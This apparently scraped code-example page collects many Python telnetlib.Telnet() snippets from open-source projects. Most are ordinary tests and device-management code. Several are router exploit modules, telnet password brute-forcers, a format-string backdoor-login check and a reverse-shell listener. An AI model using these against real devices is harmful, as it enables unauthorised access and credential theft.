Python telnetlib 模块,Telnet() 实例源码

我们从Python开源项目中,提取了以下49个代码示例,用于说明如何使用telnetlib.Telnet()

项目:sarafu    作者:pesaply    | 项目源码 | 文件源码
def interact(self):
        from telnetlib import Telnet

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

        s.bind((self._revHost, self._revPort))
        s.listen(5)
        cli = s.accept()[0]
        s.close()
        print("[+] Got connect-back")

        t = Telnet()
        t.sock = cli
        t.interact()
项目:purelove    作者:hucmosin    | 项目源码 | 文件源码
def check(self):
        try:
            tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
            tn.write(self.password + "\r\n")
            tn.write(self.config + "\r\n")

            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
            tn.close()

            if i != -1:
                return False  # target is not vulnerable
            else:
                if "<DM name=" in res:
                    return True  # target is vulnerable
        except Exception:
            return False  # target is not vulnerable

        return False  # target is not vulnerable
项目:zippy    作者:securesystemslab    | 项目源码 | 文件源码
def test_debuglevel_reads(self):
        # test all the various places that self.msg(...) is called
        given_a_expect_b = [
            # Telnet.fill_rawq
            (b'a', ": recv b''\n"),
            # Telnet.process_rawq
            (tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
            (tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
            (tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
            (tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
            (tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
           ]
        for a, b in given_a_expect_b:
            telnet = test_telnet([a])
            telnet.set_debuglevel(1)
            txt = telnet.read_all()
            self.assertIn(b, telnet._messages)
        return
项目:nettools    作者:germandutchwindtunnels    | 项目源码 | 文件源码
def connect_and_login(self):
        """ Establish a Telnet connection and perform a login """
        self.session = Telnet()
        try:
            self.session.open(self.host, self.port, self.response_timeout)
        except socket.timeout:
            return False

        if not self.login(self.username, self.password):
            return False

        try:
            self.execute_command_lowlevel("terminal length 0")
            self.execute_command_lowlevel("terminal width 0")
        except EOFError:
            return False

        return True
项目:code    作者:ActiveState    | 项目源码 | 文件源码
def close(self):

        if self.DEBUG >= 3: print "closing Telnet session <%s,%d>" % \
                (self.host, self.port)

        """ Close Telnet session """
        self.session.close()    # close telnet session

        """ Check to see if tunnel exists (note: must 
            find better way of check if tunnel exists) 
        """
        try:
            tunnel_exists = self.tunnel
        except AttributeError, e:
            return -1
        except NameError, e:
            return -1

        if self.DEBUG >= 3: print "closing ssh tunnel <%s,%s>" % \
                (self.jumpserver, self.jumpport)

        """ Close ssh tunnel (if it exists) """
        self.tunnel.close() # close tunnel
项目:beastcraft-telemetry    作者:ab77    | 项目源码 | 文件源码
def __connect( self ) :
        """ Connects to the defined server

If login/pass was specified, the class tries to authenticate. An error is raised
if something goes wrong.
        """
        if self.__debug :
            print( "[DEBUG] Connecting to host" )

        self.__srv_handler = telnetlib.Telnet( self.__host, self.__port )

        if self.__login != None :
            self.__srv_handler.write( "USERNAME %s\n" % self.__login )
            result = self.__srv_handler.read_until( "\n", self.__timeout )
            if result[:2] != "OK" :
                raise PyNUTError( result.replace( "\n", "" ) )

        if self.__password != None :
            self.__srv_handler.write( "PASSWORD %s\n" % self.__password )
            result = self.__srv_handler.read_until( "\n", self.__timeout )
            if result[:2] != "OK" :
                raise PyNUTError( result.replace( "\n", "" ) )
项目:darkc0de-old-stuff    作者:tuwid    | 项目源码 | 文件源码
def run(self):
        value = getword()
        try:
            print "-"*12
            print "User:",user[:-1],"Password:",value
            tn = telnetlib.Telnet(ipaddr[0])
            tn.read_until("login: ")
            tn.write(user[:-1] + "\n")
            if password:
                    tn.read_until("Password: ")
                    tn.write(value + "\n")
            tn.write("ls\n")
            tn.write("exit\n")
            print tn.read_all()
            print "\t\nLogin successful:",user[:-1], value
            tn.close()
            work.join()
            sys.exit(2)
        except: 
            pass
项目:darkc0de-old-stuff    作者:tuwid    | 项目源码 | 文件源码
def run(self):
        value, user = getword()
        try:
            print "-"*12
            print "User:",user,"Password:",value
            tn = telnetlib.Telnet(sys.argv[1])
            tn.read_until("login: ")
            tn.write(user + "\n")
            if password:
                    tn.read_until("Password: ")
                    tn.write(value + "\n")
            tn.write("ls\n")
            tn.write("exit\n")
            print tn.read_all()
            print "\t\nLogin successful:",value, user
            tn.close()
            work.join()
            sys.exit(2)
        except: 
            pass
项目:darkc0de-old-stuff    作者:tuwid    | 项目源码 | 文件源码
def run(self):
        value = getword()
        try:
            print "-"*12
            print "User:",user[:-1],"Password:",value
            tn = telnetlib.Telnet(ip)
            tn.read_until("login: ")
            tn.write(user[:-1] + "\n")
            if password:
                    tn.read_until("Password: ")
                    tn.write(value + "\n")
            tn.write("ls\n")
            tn.write("exit\n")
            print tn.read_all()
            print "\t\nLogin successful:",value, user[:-1]
            tn.close()
            work.join()
            sys.exit(2)
        except: 
            pass
项目:routersploit    作者:reverse-shell    | 项目源码 | 文件源码
def run(self):
        try:
            print_status("Trying to authenticate to the telnet server")
            tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
            tn.write(self.password + "\r\n")

            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)

            if i != -1:
                print_error("Exploit failed")
            else:
                if any(map(lambda x: x in res, ["#", "$", ">"])):
                    print_success("Authentication successful")
                    print_status("Displaying configuration:")
                    tn.write(self.config + "\r\n")
                    tn.interact()
                else:
                    print_error("Exploit failed")

            tn.close()
        except Exception:
            print_error("Connection error: {}:{}".format(self.target, self.telnet_port))
项目:routersploit    作者:reverse-shell    | 项目源码 | 文件源码
def check(self):
        try:
            tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
            tn.write(self.password + "\r\n")
            tn.write(self.config + "\r\n")

            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
            tn.close()

            if i != -1:
                return False  # target is not vulnerable
            else:
                if "<DM name=" in res:
                    return True  # target is vulnerable
        except Exception:
            return False  # target is not vulnerable

        return False  # target is not vulnerable
项目:routersploit    作者:reverse-shell    | 项目源码 | 文件源码
def run(self):
        try:
            print_status("Trying to authenticate to the telnet server")
            tn = telnetlib.Telnet(self.target, 23, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
            tn.write(self.password + "\r\n")

            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)

            if i != -1:
                print_error("Exploit failed")
            else:
                if any(map(lambda x: x in res, ["#", "$", ">"])):
                    print_success("Authentication successful")
                    print_status("Displaying configuration file:")
                    tn.write(self.config + "\r\n")
                    tn.interact()
                else:
                    print_error("Exploit failed")

            tn.close()
        except Exception:
            print_error("Connection error: {}:{}".format(self.target, 23))
项目:routersploit    作者:reverse-shell    | 项目源码 | 文件源码
def check(self):
        try:
            tn = telnetlib.Telnet(self.target, 23, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
            tn.write(self.password + "\r\n")
            tn.write(self.config + "\r\n")

            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
            tn.close()

            if i != -1:
                return False  # target is not vulnerable
            else:
                if any(map(lambda x: x in res, ["<DM name="])):
                    return True  # target is vulnerable
        except Exception:
            return False  # target is not vulnerable

        return False  # target is not vulnerable
项目:routersploit    作者:reverse-shell    | 项目源码 | 文件源码
def check(self):
        try:
            tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
            tn.write(self.password + "\r\n")
            tn.write("\r\n")

            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
            tn.close()

            if i != -1:
                return False  # target is not vulnerable
            else:
                if any(map(lambda x: x in res, ["#", "$", ">"])):
                    return True  # target is vulnerable
        except Exception:
            return False  # target is not vulnerable

        return False  # target is not vulnerable
项目:routersploit    作者:reverse-shell    | 项目源码 | 文件源码
def telnet_login(self):
        print_status("Telnet: {}:{} Authenticating with Username: {} Password: {}".format(self.target,
                                                                                          self.telnet_port,
                                                                                          self.remote_user,
                                                                                          self.remote_pass))
        try:
            tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
            tn.read_until(': ')
            tn.write(self.remote_user + '\r\n')
            tn.read_until(': ')
            tn.write(self.remote_pass + '\r\n')
            response = tn.read_until("Login not allowed", 10)
            tn.close()
        except Exception:
            return ""

        return response
项目:routersploit    作者:reverse-shell    | 项目源码 | 文件源码
def attack(self):
        try:
            tn = telnetlib.Telnet(self.target, self.port, timeout=10)
            tn.expect(["login: ", "Login: "], 5)
            tn.close()
        except Exception:
            print_error("Connection error {}:{}".format(self.target, self.port))
            return

        if self.defaults.startswith('file://'):
            defaults = open(self.defaults[7:], 'r')
        else:
            defaults = [self.defaults]

        collection = LockedIterator(defaults)
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
项目:purelove    作者:hucmosin    | 项目源码 | 文件源码
def run(self):
        try:
            print_status("Trying to authenticate to the telnet server")
            tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
            tn.write(self.password + "\r\n")

            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)

            if i != -1:
                print_error("Exploit failed")
            else:
                if any(map(lambda x: x in res, ["#", "$", ">"])):
                    print_success("Authentication successful")
                    print_status("Displaying configuration:")
                    tn.write(self.config + "\r\n")
                    tn.interact()
                else:
                    print_error("Exploit failed")

            tn.close()
        except Exception:
            print_error("Connection error: {}:{}".format(self.target, self.telnet_port))
项目:purelove    作者:hucmosin    | 项目源码 | 文件源码
def run(self):
        try:
            print_status("Trying to authenticate to the telnet server")
            tn = telnetlib.Telnet(self.target, 23, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
            tn.write(self.password + "\r\n")

            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)

            if i != -1:
                print_error("Exploit failed")
            else:
                if any(map(lambda x: x in res, ["#", "$", ">"])):
                    print_success("Authentication successful")
                    print_status("Displaying configuration file:")
                    tn.write(self.config + "\r\n")
                    tn.interact()
                else:
                    print_error("Exploit failed")

            tn.close()
        except Exception:
            print_error("Connection error: {}:{}".format(self.target, 23))
项目:purelove    作者:hucmosin    | 项目源码 | 文件源码
def check(self):
        try:
            tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
            tn.write(self.password + "\r\n")
            tn.write("\r\n")

            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
            tn.close()

            if i != -1:
                return False  # target is not vulnerable
            else:
                if any(map(lambda x: x in res, ["#", "$", ">"])):
                    return True  # target is vulnerable
        except Exception:
            return False  # target is not vulnerable

        return False  # target is not vulnerable
项目:purelove    作者:hucmosin    | 项目源码 | 文件源码
def telnet_login(self):
        print_status("Telnet: {}:{} Authenticating with Username: {} Password: {}".format(self.target,
                                                                                          self.telnet_port,
                                                                                          self.remote_user,
                                                                                          self.remote_pass))
        try:
            tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
            tn.read_until(': ')
            tn.write(self.remote_user + '\r\n')
            tn.read_until(': ')
            tn.write(self.remote_pass + '\r\n')
            response = tn.read_until("Login not allowed", 10)
            tn.close()
        except Exception:
            return ""

        return response
项目:purelove    作者:hucmosin    | 项目源码 | 文件源码
def attack(self):
        try:
            tn = telnetlib.Telnet(self.target, self.port, timeout=10)
            tn.expect(["login: ", "Login: "], 5)
            tn.close()
        except Exception:
            print_error("Connection error {}:{}".format(self.target, self.port))
            return

        if self.defaults.startswith('file://'):
            defaults = open(self.defaults[7:], 'r')
        else:
            defaults = [self.defaults]

        collection = LockedIterator(defaults)
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
项目:dubbo-telnet-py    作者:WALL-E    | 项目源码 | 文件源码
def do(self, command):
        # ??Telnet???
        try:
            tn = telnetlib.Telnet(host=self.host, port=self.port, timeout=self.__connect_timeout)
        except socket.error as err:
            print("[host:%s port:%s] %s" % (self.host, self.port, err))
            return

        # ??doubble???
        tn.write('\n')

        # ????
        tn.read_until(self.__finish, timeout=self.__read_timeout)
        tn.write('%s\n' % command)

        # ????
        data = ''
        while data.find(self.__finish) == -1:
            data = tn.read_very_eager()
        data = data.split("\n")
        data = json.loads(data[0], encoding=self.__encoding)

        tn.close()  # tn.write('exit\n')

        return data
项目:ZhihuSpider    作者:AlexTan-b-z    | 项目源码 | 文件源码
def initIPPOOLS(rconn):
    """????IP?? REDIS???"""

    ipNum=len(rconn.keys('IP*'))
    if ipNum<IPPOOLNUM:
        IPPOOLS=GetIPPOOLS(IPPOOLNUM)
        for ipall in IPPOOLS:
            try:
                ip=ipall.split(':')[0]
                port=ipall.split(':')[1]
                telnetlib.Telnet(ip,port=port,timeout=2) #????ip????
            except:
                logger.warning("The ip is not available !( IP:%s )" % ipall)
            else:
                logger.warning("Get ip Success!( IP:%s )" % ipall)
                rconn.set("IP:%s"%(ipall),ipall)
    else:
        logger.warning("The number of  the IP is %s!" % str(ipNum))
项目:Python-Network-Programming-Cookbook-Second-Edition    作者:PacktPublishing    | 项目源码 | 文件源码
def run_telnet_session():

    user = input("Enter your remote account: ")
    # Comment out the above line and uncomment the below line for Python 2.7.
    # user = raw_input("Enter your remote account: ")

    password = getpass.getpass()

    session = telnetlib.Telnet(HOST)

    session.read_until(b"login: ")
    session.write(user.encode('ascii') + b"\n")
    if password:
        session.read_until(b"Password: ")
        session.write(password.encode('ascii') + b"\n")

    session.write(b"ls\n")
    session.write(b"exit\n")

    print (session.read_all())
项目:mgtools    作者:miyagaw61    | 项目源码 | 文件源码
def shell():
    if(s != ''):
        print('---- interactive mode ----')
        t= telnetlib.Telnet()
        t.sock = s
        t.interact()
    elif(p != ''):
        print('---- interactive mode ----')
        proc.wait()

#katagaitai_command_start
#def xxd(a):
#    hexdump.hexdump(a)
#
#def dbg(ss):
#    print "[+] %s: 0x%x"%(ss, eval(ss))
#
#def countdown(n):
#    for i in xrange(n,0,-1):
#        print str(i) + "..",
#        sys.stdout.flush()
#        time.sleep(1)
#    print
#katagaitai_command_end
项目:rshell    作者:dhylands    | 项目源码 | 文件源码
def __init__(self, ip, user, password, read_timeout=None):
        import telnetlib
        self.tn = telnetlib.Telnet(ip, timeout=15)
        self.read_timeout = read_timeout
        if b'Login as:' in self.tn.read_until(b'Login as:', timeout=read_timeout):
            self.tn.write(bytes(user, 'ascii') + b"\r\n")

            if b'Password:' in self.tn.read_until(b'Password:', timeout=read_timeout):
                # needed because of internal implementation details of the telnet server
                time.sleep(0.2)
                self.tn.write(bytes(password, 'ascii') + b"\r\n")

                if b'for more information.' in self.tn.read_until(b'Type "help()" for more information.', timeout=read_timeout):
                    # login succesful
                    from collections import deque
                    self.fifo = deque()
                    return

        raise PyboardError('Failed to establish a telnet connection with the board')
项目:wechat_oms    作者:bsbforever    | 项目源码 | 文件源码
def switch(hostname,username,password1,password2,cmd1,cmd2):
    tn = telnetlib.Telnet(hostname,timeout=10)
    #tn.set_debuglevel(2)
    tn.read_until("Username: ")
    tn.write(username + "\n")
    tn.read_until("Password: ")
    tn.write(password1 + "\n")
    tn.read_until(">")
    tn.write('en'+ "\n")
    tn.read_until("Password: ")
    tn.write(password2 + "\n")
    tn.read_until("#")
    tn.write("terminal length 0"+"\n")
    tn.write(cmd1 + "\n")
    tn.write(cmd2 + "\n")
    #tn.read_until("#")
    tn.write("exit\n")
    result=tn.read_all()
    #print tn.read_all()
    return result
项目:poc    作者:Chinalover    | 项目源码 | 文件源码
def audit(arg):
    port = 23
    time = 5
    user = 'admin'
    password = '<<< %s(un=\'%s\') = %u'
    finish = '->'
    try:
        t = telnetlib.Telnet(arg,port, timeout=time)
        t.write(user + '\n')
        t.read_until('password: ')  
        t.write(password + '\n')
        str1 =  t.read_until(finish)
        t.write("?\n")
        str = t.read_until(finish)
        t.close()
        if ('->' in str) and ('exec' in str):
            security_hole(arg)
    except Exception, e:
        pass
项目:oil    作者:oilshell    | 项目源码 | 文件源码
def _test_read_any_eager_A(self, func_name):
        """
        read_very_eager()
          Read all data available already queued or on the socket,
          without blocking.
        """
        want = [self.block_long, 'x' * 100, 'y' * 100, EOF_sigil]
        expects = want[1] + want[2]
        self.dataq.put(want)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        func = getattr(telnet, func_name)
        data = ''
        while True:
            try:
                data += func()
                self.assertTrue(expects.startswith(data))
            except EOFError:
                break
        self.assertEqual(expects, data)
项目:oil    作者:oilshell    | 项目源码 | 文件源码
def test_read_lazy_A(self):
        want = ['x' * 100, EOF_sigil]
        self.dataq.put(want)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        time.sleep(self.block_short)
        self.assertEqual('', telnet.read_lazy())
        data = ''
        while True:
            try:
                read_data = telnet.read_lazy()
                data += read_data
                if not read_data:
                    telnet.fill_rawq()
            except EOFError:
                break
            self.assertTrue(want[0].startswith(data))
        self.assertEqual(data, want[0])
项目:oil    作者:oilshell    | 项目源码 | 文件源码
def test_read_very_lazy_A(self):
        want = ['x' * 100, EOF_sigil]
        self.dataq.put(want)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        time.sleep(self.block_short)
        self.assertEqual('', telnet.read_very_lazy())
        data = ''
        while True:
            try:
                read_data = telnet.read_very_lazy()
            except EOFError:
                break
            data += read_data
            if not read_data:
                telnet.fill_rawq()
                self.assertEqual('', telnet.cookedq)
                telnet.process_rawq()
            self.assertTrue(want[0].startswith(data))
        self.assertEqual(data, want[0])
项目:oil    作者:oilshell    | 项目源码 | 文件源码
def _test_command(self, data):
        """ helper for testing IAC + cmd """
        self.setUp()
        self.dataq.put(data)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        nego = nego_collector()
        telnet.set_option_negotiation_callback(nego.do_nego)
        txt = telnet.read_all()
        cmd = nego.seen
        self.assertTrue(len(cmd) > 0) # we expect at least one command
        self.assertIn(cmd[0], self.cmds)
        self.assertEqual(cmd[1], tl.NOOPT)
        self.assertEqual(len(''.join(data[:-1])), len(txt + cmd))
        nego.sb_getter = None # break the nego => telnet cycle
        self.tearDown()
项目:python2-tracer    作者:extremecoders-re    | 项目源码 | 文件源码
def _test_read_any_eager_A(self, func_name):
        """
        read_very_eager()
          Read all data available already queued or on the socket,
          without blocking.
        """
        want = [self.block_long, 'x' * 100, 'y' * 100, EOF_sigil]
        expects = want[1] + want[2]
        self.dataq.put(want)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        func = getattr(telnet, func_name)
        data = ''
        while True:
            try:
                data += func()
                self.assertTrue(expects.startswith(data))
            except EOFError:
                break
        self.assertEqual(expects, data)
项目:python2-tracer    作者:extremecoders-re    | 项目源码 | 文件源码
def test_read_lazy_A(self):
        want = ['x' * 100, EOF_sigil]
        self.dataq.put(want)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        time.sleep(self.block_short)
        self.assertEqual('', telnet.read_lazy())
        data = ''
        while True:
            try:
                read_data = telnet.read_lazy()
                data += read_data
                if not read_data:
                    telnet.fill_rawq()
            except EOFError:
                break
            self.assertTrue(want[0].startswith(data))
        self.assertEqual(data, want[0])
项目:python2-tracer    作者:extremecoders-re    | 项目源码 | 文件源码
def test_read_very_lazy_A(self):
        want = ['x' * 100, EOF_sigil]
        self.dataq.put(want)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        time.sleep(self.block_short)
        self.assertEqual('', telnet.read_very_lazy())
        data = ''
        while True:
            try:
                read_data = telnet.read_very_lazy()
            except EOFError:
                break
            data += read_data
            if not read_data:
                telnet.fill_rawq()
                self.assertEqual('', telnet.cookedq)
                telnet.process_rawq()
            self.assertTrue(want[0].startswith(data))
        self.assertEqual(data, want[0])
项目:python2-tracer    作者:extremecoders-re    | 项目源码 | 文件源码
def _test_command(self, data):
        """ helper for testing IAC + cmd """
        self.setUp()
        self.dataq.put(data)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        nego = nego_collector()
        telnet.set_option_negotiation_callback(nego.do_nego)
        txt = telnet.read_all()
        cmd = nego.seen
        self.assertTrue(len(cmd) > 0) # we expect at least one command
        self.assertIn(cmd[0], self.cmds)
        self.assertEqual(cmd[1], tl.NOOPT)
        self.assertEqual(len(''.join(data[:-1])), len(txt + cmd))
        nego.sb_getter = None # break the nego => telnet cycle
        self.tearDown()
项目:actsys    作者:intel-ctrlsys    | 项目源码 | 文件源码
def _establish_connection(cls, remote_access_data):
        """Establish telnet connection"""
        try:
            time.sleep(cls.SLEEP_TIME)
            tnet = telnetlib.Telnet(remote_access_data.address, timeout=cls.TIMEOUT)
        except EnvironmentError:
            # print "Telnet: Error connecting to remote device"
            return None
        if remote_access_data.username != 'None':
            tnet.read_until("login:")
            tnet.write("\r\n" + remote_access_data.username + "\r\n")
        if remote_access_data.identifier != 'None':
            tnet.read_until("Password: ")
            tnet.write("\r\n" + remote_access_data.identifier + "\r\n")
            tnet.read_until(">")
        return tnet
项目:mobly    作者:google    | 项目源码 | 文件源码
def cmd(self, cmd_str, wait_ret=True):
        if not isinstance(cmd_str, str):
            raise TypeError("Invalid command string", cmd_str)
        if not self.is_open:
            raise attenuator.Error("Telnet connection not open for commands")

        cmd_str.strip(self.tx_cmd_separator)
        self._tn.read_until(_ascii_string(self.prompt), 2)
        self._tn.write(_ascii_string(cmd_str + self.tx_cmd_separator))
        if wait_ret is False:
            return None

        match_idx, match_val, ret_text = self._tn.expect(
            [_ascii_string("\S+" + self.rx_cmd_separator)], 1)

        if match_idx == -1:
            raise attenuator.Error(
                "Telnet command failed to return valid data")

        ret_text = ret_text.decode()
        ret_text = ret_text.strip(self.tx_cmd_separator + self.rx_cmd_separator
                                  + self.prompt)

        return ret_text
项目:fermentrack    作者:thorrak    | 项目源码 | 文件源码
def test_telnet(hostname):
  # This attempts to test the validity of a controller
  # It returns a tuple (probably not the best way to do this) which is in the format:
  # Initial Connection Test (bool), Version Response Test (bool), Version Response (str)
  try:
    tn = telnetlib.Telnet(host=hostname, timeout=3)
  except socket.timeout:
    return False, False, None
  try:
    tn.write("n\r\n")
    version_string = tn.read_until("}",3)
  except:
    return True, False, None
  return True, True, version_string


# The following was used for testing during development
项目:web_ctp    作者:molebot    | 项目源码 | 文件源码
def test_debuglevel_reads(self):
        # test all the various places that self.msg(...) is called
        given_a_expect_b = [
            # Telnet.fill_rawq
            (b'a', ": recv b''\n"),
            # Telnet.process_rawq
            (tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
            (tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
            (tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
            (tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
            (tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
           ]
        for a, b in given_a_expect_b:
            telnet = test_telnet([a])
            telnet.set_debuglevel(1)
            txt = telnet.read_all()
            self.assertIn(b, telnet._messages)
        return
项目:ospf-model-test    作者:gnakibli    | 项目源码 | 文件源码
def FetchCiscoLSDB(globals):    
    sys.stderr.write('fetch cisco LSDB')            
    LSADB = {}
    for r in controlport:
        sys.stderr.write('Fetch ' + r + '\n')
        tn = telnetlib.Telnet(LXCIP, controlport[r])
        LoginToRouter(r, tn)
        CLIoutput = ""
        for lsatype in ["router", "network"]:
            #print "XXXXXXXXXXXXfetch" + lsatype 
            tn.write("show ip ospf database %s \n\r" % lsatype )
            CLIoutput += tn.read_until("#")
            tn.read_very_eager()
        print "*******************" + str(r) + "**************"
        print CLIoutput
        print "--------------------------------------------"
        LSADB[r] = ParseCLIoutput(CLIoutput,globals)
        tn.close()
    return LSADB
项目:tulpar    作者:anilbaranyelken    | 项目源码 | 文件源码
def portScanner(url,dosyaAdi):
    raporIcerik=""
    baslangic=int(raw_input("Start port: "))
    bitis=int(raw_input("Finish port: "))
    for port in range(baslangic, bitis, 1):
        try:
            i=str(port)
            baglanti = telnetlib.Telnet(url, i)
            baglanti.write("\n")
            print "[+]", str(port), " - ", baglanti.read_all().splitlines()[0]
            raporIcerik+="[+]", str(port), " - ", baglanti.read_all().splitlines()[0]+"\n"
            baglanti.close()
        except:
            pass

    rapor = open(dosyaAdi, "a")
    rapor.write(raporIcerik)
    rapor.close()
项目:tulpar    作者:anilbaranyelken    | 项目源码 | 文件源码
def method(url,dosyaAdi):
    try:
        telnetBaglanti = telnetlib.Telnet(url, 80)
        telnetBaglanti.write("OPTIONS / HTTP/1.1\n")
        komut = "Host: " + url + "\n\n\n\n"
        telnetBaglanti.write(komut)
        sayfa = telnetBaglanti.read_all()
        deger = str(sayfa).find("Allow")
        deger2 = str(sayfa).find("\n", deger + 1)
        Metodlar = sayfa[deger:deger2]
        print "Methods: ", Metodlar
        raporIcerik="[+]Methods: "+Metodlar+"\n"
        rapor = open(dosyaAdi, "a")
        rapor.write(raporIcerik)
        rapor.close()
    except:
        pass
项目:charm-percona-cluster    作者:openstack    | 项目源码 | 文件源码
def is_port_open(self, unit=None, port='3306', address=None):
        if unit:
            addr = unit.info['public-address']
        elif address:
            addr = address
        else:
            raise Exception('Please provide a unit or address')

        try:
            telnetlib.Telnet(addr, port)
            return True
        except socket.error as e:
            if e.errno == 113:
                self.log.error("could not connect to %s:%s" % (addr, port))
            if e.errno == 111:
                self.log.error("connection refused connecting"
                               " to %s:%s" % (addr,
                                              port))
            return False
项目:labgrid    作者:labgrid-project    | 项目源码 | 文件源码
def get(host, index):
    index = int(index)
    assert 1 <= index <= 4
    tn = telnetlib.Telnet(host, 1234, 1)
    tn.read_until(b"\r\n", 0.5)
    tn.write(b"login admin admin\n")
    tn.read_until(b"250 OK\r\n", 0.5)
    tn.write("port {}\n".format(index).encode())
    read = tn.read_until(b"\r\n", 0.5)
    m = re.match(".*250 (\d).*", read.decode())
    if m is None:
        raise Exception("NetIO: could not match response")
    value = m.group(1)
    tn.write(b"quit\n")
    tn.close()
    return value == "1"
项目:AnyScan    作者:zhangzhenfeng    | 项目源码 | 文件源码
def audit(arg):
    port = 23
    time = 5
    user = 'admin'
    password = '<<< %s(un=\'%s\') = %u'
    finish = '->'
    try:
        t = telnetlib.Telnet(arg,port, timeout=time)
        t.write(user + '\n')
        t.read_until('password: ')
        t.write(password + '\n')
        str1 =  t.read_until(finish)
        t.write("?\n")
        str = t.read_until(finish)
        t.close()
        if ('->' in str) and ('exec' in str):
            security_hole(arg)
            return arg
    except Exception, e:
        pass
项目:kekescan    作者:xiaoxiaoleo    | 项目源码 | 文件源码
def audit(arg):
    port = 23
    time = 5
    user = 'admin'
    password = '<<< %s(un=\'%s\') = %u'
    finish = '->'
    try:
        t = telnetlib.Telnet(arg,port, timeout=time)
        t.write(user + '\n')
        t.read_until('password: ')  
        t.write(password + '\n')
        str1 =  t.read_until(finish)
        t.write("?\n")
        str = t.read_until(finish)
        t.close()
        if ('->' in str) and ('exec' in str):
            security_hole(arg)
    except Exception, e:
        pass
项目:pefile.pypy    作者:cloudtracer    | 项目源码 | 文件源码
def _test_read_any_eager_A(self, func_name):
        """
        read_very_eager()
          Read all data available already queued or on the socket,
          without blocking.
        """
        want = [self.block_long, 'x' * 100, 'y' * 100, EOF_sigil]
        expects = want[1] + want[2]
        self.dataq.put(want)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        func = getattr(telnet, func_name)
        data = ''
        while True:
            try:
                data += func()
                self.assertTrue(expects.startswith(data))
            except EOFError:
                break
        self.assertEqual(expects, data)
项目:pefile.pypy    作者:cloudtracer    | 项目源码 | 文件源码
def test_read_lazy_A(self):
        want = ['x' * 100, EOF_sigil]
        self.dataq.put(want)
        telnet = telnetlib.Telnet(HOST, self.port)
        self.dataq.join()
        time.sleep(self.block_short)
        self.assertEqual('', telnet.read_lazy())
        data = ''
        while True:
            try:
                read_data = telnet.read_lazy()
                data += read_data
                if not read_data:
                    telnet.fill_rawq()
            except EOFError:
                break
            self.assertTrue(want[0].startswith(data))
        self.assertEqual(data, want[0])